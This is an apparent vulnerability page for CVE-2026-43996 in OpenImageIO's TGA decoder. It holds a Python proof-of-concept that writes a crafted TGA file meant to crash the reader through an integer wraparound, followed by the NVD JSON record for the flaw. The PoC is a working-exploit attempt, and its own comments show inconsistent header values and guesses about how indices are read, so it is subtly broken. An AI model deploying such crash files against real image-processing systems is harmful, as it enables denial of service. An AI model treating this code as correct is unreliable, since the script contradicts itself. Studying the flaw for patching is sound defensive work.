CVE-2026-43996

import struct # Create a malicious TGA file to trigger the overflow # TGA Header: ID length(1), Color map type(1), Image type(1) # Color map spec(5), Image spec(10) # We need specific conditions to hit k=0xFFFFFFFC and palbytespp=4 # This is a simplified PoC structure demonstrating the concept. def generate_malicious_tga(filename): with open(filename, 'wb') as f: # TGA Header (Simplified) # Image type 1 (Uncompressed, Color-mapped) header = b'\x00\x01\x01' # Color map spec: first entry index (2 bytes), length (2 bytes), entry size (1 byte) # Setting entry size to 4 bytes (palbytespp = 4) colormap_spec = struct.pack('<HHB', 0, 256, 8) # 8 bits per entry? No, usually 24/32. Let's assume 32bit map. # To trigger k=0xFFFFFFFC, the image data needs to contain this index. # Image spec: x(2), y(2), width(2), height(2), pixel depth(1), descriptor(1) width = 1 height = 1 image_spec = struct.pack('<HHHHBB', 0, 0, width, height, 8, 0) f.write(header + colormap_spec + image_spec) # Write Color Map Data (dummy) f.write(b'\x00' * 256 * 4) # Write Image Data (Pixel Index) # Writing 0xFFFFFFFC as the index to trigger the bug in decode_pixel # Note: Dependent on how OpenImageIO reads the byte stream for indices. # If it reads a byte, max is 0xFF. If it reads a short/long, 0xFFFFFFFC is possible. # Assuming the context allows for this index value. f.write(struct.pack('<I', 0xFFFFFFFC)) if __name__ == "__main__": generate_malicious_tga('crash.tga') print('Malicious TGA file generated: crash.tga')

{"cve": {"id": "CVE-2026-43996", "sourceIdentifier": "[email protected]", "published": "2026-05-14T20:17:07.300", "lastModified": "2026-05-14T21:21:10.620", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenImageIO is a toolset for reading, writing, and manipulating image files of any image file format relevant to VFX / animation. Prior to 3.0.18.0 and 3.1.13.0, the bounds check in TGAInput::decode_pixel computes k + palbytespp as unsigned 32-bit arithmetic. When k = 0xFFFFFFFC and palbytespp = 4, the addition wraps to 0, which compares less than palette_alloc_size and passes the check. The subsequent palette access uses the unwrapped k (0xFFFFFFFC) as the index, reading ~4 GB past the start of the palette buffer — SEGV. This vulnerability is fixed in 3.0.18.0 and 3.1.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "references": [{"url": "https://github.com/AcademySoftwareFoundation/OpenImageIO/security/advisories/GHSA-mq8j-73c4-cr55", "source": "[email protected]"}]}}